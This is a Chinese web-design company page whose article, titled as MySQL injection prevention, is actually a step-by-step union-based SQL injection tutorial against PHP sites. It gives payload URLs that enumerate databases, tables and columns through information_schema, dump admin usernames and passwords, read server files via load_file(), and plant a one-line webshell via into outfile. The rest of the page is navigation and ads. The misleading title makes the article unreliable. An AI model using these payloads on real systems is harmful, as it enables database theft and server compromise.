点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息  
 
 
  网站建设   广州威客   网上商机   网上商城   海讯黄页   网址天地   专区展示   社 区  
 
 
 
首 页  建站套餐  我要建站  案例欣赏  网站模板  服务区域  域名查询管理  企业邮局  主机空间  策划推广  海佳优势  客服中心  代理专区
各地分公司: 北京站 | 上海站 | 广州站 | 南宁站 | 郑州站 | 南京站 | 武汉站
 下载天地 | 海佳教学 | 学员报名 | 开设课程 | 培训机构 | 论坛 | 培训简介 | 开设课程
 学员报名 | 毕业优势 |  IT外包 | 分类广告 | 网上商机 | 海讯黄页
   您现在的位置是:海讯集团>>我要建站
海讯集图-新闻中心-mysql防注入代码,防止别人写入代码 [更多...]
 



mysql防注入代码,防止别人写入代码


http://www.okit88.com    发布日期:2011-7-28 11:08:15    浏览次数:12887     < 返回 >

mysql防注入代码,防止别人写入代码

mysql5注入2010-05-30 16:45假设url:http://www.abc.com/fuck.php?id=1
这里只讨论php+mysql5的搭配,并且在mysql5中的information_schema系统表可以正常使用的情况下...

1.判断是否是注入点:and 1=1/*   and 1=2/*
2.判断字段长度
假如http://www.abc.com/fuck.php?id=1 order by n/*时出错,字段长度就是n-1
当然可以采用递增的方法http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5.....n-1/*
3.判断版本,数据库名,数据库连接用户名,mysql系统用户,用户密码
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5....n-1/*这里出现的索引值,我们只能用字符型的索引值,假设索引值是2、3、4,而且都是字符型的
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(version())),unhex(hex(user())),unhex(hex(database
())),5.....n-1/*
有些时候我们不对函数进行编码的话,可以会读取不出来,所以我们直接利用unhex(hex())绕过直接读取,如果这个要读不出来,我也没办法了
假设这里得到mysql连接用户是abc,我们先对abc进行16进制编码为0x616263,然后可以通过http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(password(0x616263))),3,4,5.....n-1/*获得abc用户的密码hash
mysql的密码官方标准的加密方式是40位sha1加密,但是也有部分采用的是md5或者其他的加密方式
4.判断是否存在information_schema系统表(我没有想到更好的办法)
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5....n-1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata/*
如果有返回值的话就说明information_schema系统是存在的
5.判断数据库服务器中有多少个数据库(系统库有information_schema、test、mysql三个)
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 0,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 1,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 2,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 3,1/*
limit进行递增,一旦出错的话就说明没有了
6.假设有个库名是fuck,我们来查fuck库中的表
首先对fuck进行16进制编码为0x6675636B
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,table_name,3,4,5....n-1 from information_schema.tables where
table_schema=0x6675636B limit 0,1/*
同上面一样进行limit参数递增,得到fuck库中所有的表,假设有个表是admin
7.我们来读取fuck库中admin表中的字段
同样我们要对admin进行16进制编码为0x61646D696E,提交
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,column_name,3,4,5....n-1 from information_schema.columns where table_name=0x61646D696E limit 0,1/*
同样limit进行递增,假设字段是username和password
8.获得fuck库admin表username和password字段的内容
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,username,password,4,5....n-1 from admin
如果读取的数据库名和user()函数读取的一样的话,假设上面的fuck库不是web当前使用的数据库,最后读取字段内容的时候admin表要写成fuck.admin的形式
还有就是load_file()和into outfile()函数的使用
先说load_file()
路径有使用者自己来输入,假设是c:\boot.ini,先对c:\boot.ini进行16进制编码为0x633A5C626F6F742E696E69,然后提交
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(load_file(0x633A5C626F6F742E696E69))),3,4,5....n-1/*
这个load_file()进行unhex(hex())绕一下效果更好
into outfile()函数,在php脚本中威力表现不出来,因为php版本默认设置的原因,如果是其他脚本和mysql搭配的话,into outfile()就能发挥威

力了
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,'一句话木马',3,4,5....n-1 into oufile('xxxxx')/*
路径可以16进制编码下

 
案例类别[更多]
木业、木材加工
会展、设计、策划类
动漫、游戏机、福彩
外语、翻译、律师事务
生物养生、风水易经
家政劳务、搬家、移民
购物类,综合类
政府、行业、门户型
服装、鞋帽、布料
皮具、皮包、文件夹
旅游、机票、酒店
二手车交易、旅游租车
母婴、日用、化妆品
美容、美体、美发
医药、保健、医疗器械
婚庆、礼仪庆典
投资、顾问、咨询
电子、五金、机械
环保、化工、涂料
教育培训、文化、娱乐
房地产、房屋租赁
IT科技、软件、通信
金融、股票保险、财经
建筑、建材、装饰
食品、饮料(酒)、茶叶
家居、家电、电器
工艺品、礼品、鲜花
办公、文教、乐器
广告、包装、雕刻印刷
汽车、物流、汽配
物业、票务、船务
仪器、仪表、保险柜
摄影、冲印、玩具
拍卖、投资、典当
珠宝、首饰品
钟表、眼镜
照明、水电、能源
演艺、体育、文体用品
贸易、出口、报关
宠物、宠物食品
交友网站
音响,影院,器械设备
网站建设技术专题
· QQ在线咨询显示未启用,QQ在线... - [2013-5-21]
· 点击下载按钮 自动更新... - [2013-4-27]
· [88229999]com.te... - [2013-1-15]
· 如何查看服务器PID,W3WP.... - [2011-12-25]
· 来源W3SVC 事件I... - [2011-12-23]
· sql数据库连接语句,sql数据... - [2011-12-22]
· W3wp.exe 进程... - [2011-12-22]
· 服务器CPU占用过高,w3wp.... - [2011-12-22]
· asp图片加水印,asp图片上传... - [2011-7-28]
最新行业报道
· 页面注册指向和返回 - [2013-9-30]
· 记录网页浏览次数,记录浏次数 - [2013-9-30]
· 月份的英文缩写,月份的英文写法 - [2013-9-30]
· 网站制作-输入框只能输入数字 - [2013-9-30]
· QQ客服在页面固定位置的代码 - [2013-9-28]
· flash全屏代码,flash全... - [2013-9-28]
· 域名更改解析后 打不开网站。电脑... - [2013-5-29]
· 360浏览器拦截网站,百度拦截网... - [2013-5-29]
· js中的Mid()函数对应的JS... - [2013-5-21]
· 做网站多少钱,建网站多少钱,网站... - [2012-2-9]
专题网站推荐
· Flash分解工具集中营  2009-8-18
· Flash动画实用分解工具--Fla...  2009-8-18
· 下载和分解Flash动画  2009-8-18
· Flash MX as 声音控制分解  2009-8-18
· 电子商务的概念  2009-7-19
· 电子商务的分类状况  2009-7-19
· 电子商务在欧美的情况  2009-7-19
· 电子商务的中国概况  2009-7-19
· 电子商务的成功因素  2009-7-19
代开淘宝网店,店铺装修
·您是否拥有自己的实体店.想为您的商品,多种推销方式.
·您是否在工作不忙的时候,想做份兼职,想赚点外块.
·您是否觉得在淘宝开店铺买卖都很繁琐.需要人的帮忙!
·本公司专业代开淘宝网店.代购淘宝商品
·全程服务.办理开店.店铺装修!手把手的交您,物品买卖.发布商品.如何交易.等淘宝问题!
以上内容均为网上操作,简单方便,包您满决,
 只需500元  [更多详请]  
海讯大学|专题报道尖端技术
· Flash分解工具集中营  2009-8-18
· Flash动画实用分解工具--Fla...  2009-8-18
· 下载和分解Flash动画  2009-8-18
· Flash MX as 声音控制分解  2009-8-18
· 电子商务的概念  2009-7-19
· 电子商务的分类状况  2009-7-19
· 电子商务在欧美的情况  2009-7-19
· 电子商务的中国概况  2009-7-19
· 电子商务的成功因素  2009-7-19



·三菱触摸屏 ·三菱变频器 ·郑州网站建设 ·上海网站建设shbyzun.com ·绿色网 ·昆明论坛 ·百度
·广州网站建设 ·广州网页设计 ·广州建网站 ·广东做网站 ·广州网站设计 ·广州网站制作 ·广州网站建设
·广东建网站 ·广州网站建设公司 ·蒙娜丽莎威客
域名|邮箱|主机产品
企业邮箱 VPS主机 特惠主机 美国主机 香港主机 欧洲主机 短信网址 中文域名 国际域名
企业邮箱 VPS主机 特惠主机 美国主机 香港主机 欧洲主机 短信网址 中文域名 国际域名
  关于海讯 | 加盟合作 | 服务指南 | 诚聘英才 | 服务项目 | 监督热线 | BBS论坛
版权所有:广州IT服务中心  广州海佳网络科技有限公司 ◎ 2006-2010
地址:广州天河车陂路6号东盛大厦三楼。(车陂文化广场傍),地铁车陂南站C出口,大概10米,
易先生 刘小姐 周先生 宋小姐   服务手机:15918582336 18929587904  13710230354  服务电话:020-82161215 020-85832530 020-82162885 (南宁市)15977128000 15877163912   
常年法律顾问:黄律师   执证号:190001112580    您是第 53678380 位来访者   服务邮箱:okit88@126.com 
网站地址:http://www.okit88.com 国信备案号:粤ICP备07024418号 
广州网站建设 广州建网站 建网站 网站建设 建手机APP网站 建微信网站 广州网站建设 广州网页设计 网站建设 广州威客

网站建设

广州网站建设

广州建网站

建网站


粤公网安备:44010602002058号
电话:020-82161215。广州it公司,海佳科技集团